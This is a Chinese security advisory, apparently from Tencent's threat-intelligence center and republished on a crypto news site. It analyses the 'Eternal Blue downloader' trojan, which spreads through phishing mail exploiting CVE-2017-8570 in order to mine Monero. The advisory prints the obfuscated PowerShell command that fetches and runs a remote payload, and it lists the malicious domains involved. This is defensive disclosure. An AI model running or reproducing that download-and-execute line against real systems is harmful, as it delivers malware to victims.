
“永恒之蓝下载器木马”新增钓鱼邮件传播,利用用户机器挖矿门罗币
编者注:原标题为《“永恒之蓝下载器木马”新增钓鱼邮件传播,附件含CVE-2017-8570漏洞攻击代码》
“永恒之蓝”下载器木马在感染用户机器上运行后,会自动当前用户的邮箱通讯录并发送附件为urgent.doc的文档,该文档附带CVE-2017-8570漏洞(Office高危漏洞,又称沙虫二代)攻击代码。
如果被攻击用户收到邮件并不慎打开文档,就可能触发漏洞执行Powershell命令下载mail.jsp:
C:/Windows/System32/cmd.exe /c powershell IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)
而下载使用的域名ap35nf7.jp实际上并没有注册,但是依然能够解析到地址:t.awcna.com,是因为被感染机器的本地hosts文件被篡改,使得随机生成的域名映射到木马使用的恶意地址,细节请参考御见威胁情报中心此前发布的报告:《“永恒之蓝下载器”木马篡改hosts指向随机域名,再用多个漏洞攻击内网挖矿》。
本次攻击过程中,木马将使用随机生成的字符加“.cn”或”.jp“或”.kr“后缀作为DGA域名,并在hosts文件中指向域名:
t.tr2q.com,t.awcna.com,t.amynx.com
mail.jsp经过高度混淆,多次解密后可以看到其安装多个计划任务下载Powershell脚本执行,并使用了新的计划任务名:“Bluetea“蓝茶。
“永恒之蓝”下载器木马自出现之后从未停止更新,从最初的PE样本攻击到后来转移为以Powershell无文件攻击方式躲避查杀,并且通过安装多个类型的计划任务进行持久化。在传播方式上,最初通过供应链攻击积累一批感染机器后,又不断利用”永恒之蓝”漏洞,MSSql爆破,$IPC爆破,RDP爆破等方法进行扩散传播,近期又增加了DGA域名攻击和钓鱼邮件攻击,其最终目的只为利用用户机器挖矿门罗币获利。
永恒之蓝下载器木马的历次版本更新参考下表:
安全建议
1.建议用户不要轻易打开不明来源的邮件附件,对于邮件附件中的文件要格外谨慎运行,如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描;
2.服务器使用安全的密码策略,特别是IPC$、MSSQL、RDP账号密码,切勿使用弱口令,避免遭遇弱密码爆破攻击;
3.根据微软安全公告及时修复Office漏洞CVE-2017-8570,需进行漏洞扫描和修复,或采用Windows Update进行。
来源:腾讯御见威胁情报中心
比推快讯
更多 >>- 今晚降息预期与美联储独立性受考验
- Gemini 在欧盟推出 ETH 和 SOL 质押及永续合约服务
- 某新地址以 4315 美元均价增持 15,256.6 枚 ETH,已浮盈约 130 万美元
- 数据:MARA 8 月运营数据,BTC 持有量突破 52,000 枚
- 某新地址 10 倍做多 PEPE 和 WIF,总仓位规模达 450 万美元
- 以太坊提币趋势延续,过去 24 小时 CEX 净流出 4.82 万枚 ETH
- 数据:ETH 当前全网 8 小时平均资金费率为 0.0007%
- JustLend DAO 能源租赁费率下调
- BitMine:不受纳斯达克针对加密财库公司配股募资要求的约束
- 某巨鲸地址从 Galaxy Digital 接收超 1 万枚 ETH,价值约 4404 万美元
- RootData 联合 Tiger Research 将于 9 月 24 日在首尔举办 “Insights For Web3 Future” 行业峰会
- 价值超 440 万美元 ENS 解锁并转出至 Binance 和 Galaxy Digital
- 澳大利亚 Monochrome 现货比特币 ETF 的 BTC 持仓升至 1029 枚
- Spectra Markets 总裁:若非农数据强于预期,或将削弱美联储降息预期从而进一步压制 BTC 价格
- 非农数据今晚公布,或影响美联储降息决策
- Sora Ventures 宣布推出一只比特币储备基金,计划 6 个月内购入 10 亿美元比特币
- Bitget 链上交易(Onchain)本周涨幅榜 Top 3:Huch、Polyfactual、Cards
- 10x Research:投资者对比特币看跌期权需求旺盛,市场对非农数据、BLS 修正、CPI 以及议息会议等事件高度警惕
- 某新地址增持 30.9 万枚 HYPE 并质押,价值超 1400 万美元
- 币安已开放 Baby Doge Coin(1 MBABYDOGE)在 Solana 网络的充值和提现业务
- 最高检公布一起涉虚拟货币的编造虚假国家项目诈骗案,骗取资金超 600 万元
- James Wynn喊单市值仅 15.7 万美元 Meme 币,现已涨超 240%
- DWF Labs 执行合伙人:已在 Tron 上铸造首笔 1000 万枚 USD1
- 俄罗斯央行维持高利率应对高通胀
- 莆田涵江检方判决虚拟货币地下外汇案,涉案资金超 133 亿元
- Binance Alpha 新空投 BOOST 积分门槛 220 分
- 汇丰:香港未来或有人民币稳定币,部分大型央企正积极探索稳定币应用
- 交易员 Eugene:SOL 多单已平仓,市场仍在震荡
- Chainlink 储备增持约 4.4 万枚 LINK 代币,总持仓规模升至约 534 万美元
- 贾跃亭:法拉第未来暂无计划通过发行股份增持财库产品
- 安全公司:AI 编程工具 Cursor 有被新病毒劫持的风险
- 特朗普邀请科技巨头 CEO 参加晚宴,马斯克缺席,Tim Cook、Sam Altman 等出席
- xBTC 在 Sui 上的铸造数量已突破 875 枚,并将上线 X Layer
- Tether 正在就投资黄金矿业进行洽谈,当前持有价值 87 亿美元的黄金储备
- 财新:北京最大场外配资老板宋世杰涉洗钱与加密骗局,英美收取和解金 2 亿元,没收资产 1.61 亿元
- 数据:当前加密恐慌贪婪指数为 47,处于中性状态
- 美 SEC:由于可避免的技术故障,前主席 Gary Gensler 近一年的短信永久丢失
- 昨日美国比特币现货 ETF 净流出 2.229 亿美元,以太坊现货 ETF 净流出 1.673 亿美元
- 观点:以太坊仍将盘整数周,美联储议息会议前将触及高点
- BitMEX 将于 9 月 9 日上线 Q4 季度合约,新增 ADAZ25、ETHZ25、ETHUSDZ25 等
- 孙宇晨发布长文呼吁 World Liberty Financials 解锁其代币
- Justin Sun 转发 Nansen CEO 力挺自己的推文,并自称无辜
- Monex 提升对 3iQ 控制权至 97.8%,作价 4584 万加元
- Nate Geraci 暗示美 SEC 前主席 Gensler 在 FTX 崩溃期间的短信丢失或并非巧合
- 数据:EUL 短时触及 13.74 USDT,5 分钟内涨幅 23.92%,现报 11.56 USDT
- WLFI TOP1 个人持有者开始转移分散价值 1469 万美元 WLFI,或将卖出
- 2025 年至今,美国已有 154 家上市公司宣布计划筹集约 984 亿美元用于购买加密货币
- Bithumb 新增 Euler(EUL)韩元交易市场
- 彭博经济学家:无论今晚非农报告数据如何,后续修订结果或将迅速上调
- HackQuest 全资收购前 Gitcoin 黑客松平台 BuidlBox
比推专栏
更多 >>观点
比推热门文章
- 某新地址以 4315 美元均价增持 15,256.6 枚 ETH,已浮盈约 130 万美元
- 数据:MARA 8 月运营数据,BTC 持有量突破 52,000 枚
- 0 到 124 亿美元仅一步之遥,Ethena 的“印钞机”逻辑是什么?
- 某新地址 10 倍做多 PEPE 和 WIF,总仓位规模达 450 万美元
- 以太坊提币趋势延续,过去 24 小时 CEX 净流出 4.82 万枚 ETH
- 数据:ETH 当前全网 8 小时平均资金费率为 0.0007%
- JustLend DAO 能源租赁费率下调
- Bitget 将在英国皇家学会举办 “精英日 Elite Day”
- BitMine:不受纳斯达克针对加密财库公司配股募资要求的约束
- 某巨鲸地址从 Galaxy Digital 接收超 1 万枚 ETH,价值约 4404 万美元